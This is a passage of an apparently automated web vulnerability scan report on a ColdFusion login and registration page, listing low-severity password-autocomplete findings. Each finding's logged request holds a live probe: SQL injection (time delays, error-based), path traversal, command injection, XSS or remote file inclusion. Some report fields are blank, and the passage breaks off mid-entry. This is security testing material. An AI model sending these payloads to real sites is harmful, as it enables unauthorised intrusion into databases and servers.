Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1;WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.91. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%26expr%20268409241%20-%202%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%26expr%20268409241%20-%202%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.92. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=;ns:expression(netsparker(0x000045)); HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=;ns:expression(netsparker(0x000045));" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.93. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.94. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.95. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=../../../../../../../../../../proc/self/fd/2%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2%00" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.96. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=-1+OR+17-7%3d10 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=-1+OR+17-7%3d10" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.97. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:05 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.98. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.99. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.100. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=http://www.netsparker.com? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=http://www.netsparker.com?" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.101. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%2527 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%2527" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.102. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=*/netsparker(0x000052)%3B/* HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=*/netsparker(0x000052)%3B/*" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.103. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.104. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hmc/report/?'"--></style></script><script>netsparker(0x000054)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:08 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:42:08 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">


   <form name="form1" action="/hmc/report/index.cfm?'"--></style>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...
18.105. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%26%20SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.106. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /hmc/report/?register=%22%2Bresponse.write(268409241-22)%2B%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
</SCRIPT>

   
       <form name="form1" action="/hmc/report/index.cfm?register=%22%2Bresponse.write(268409241-22)%2B%22" method="post" onSubmit="document.form1.register.disabled='disabled';">
       
       
           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
18.107. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

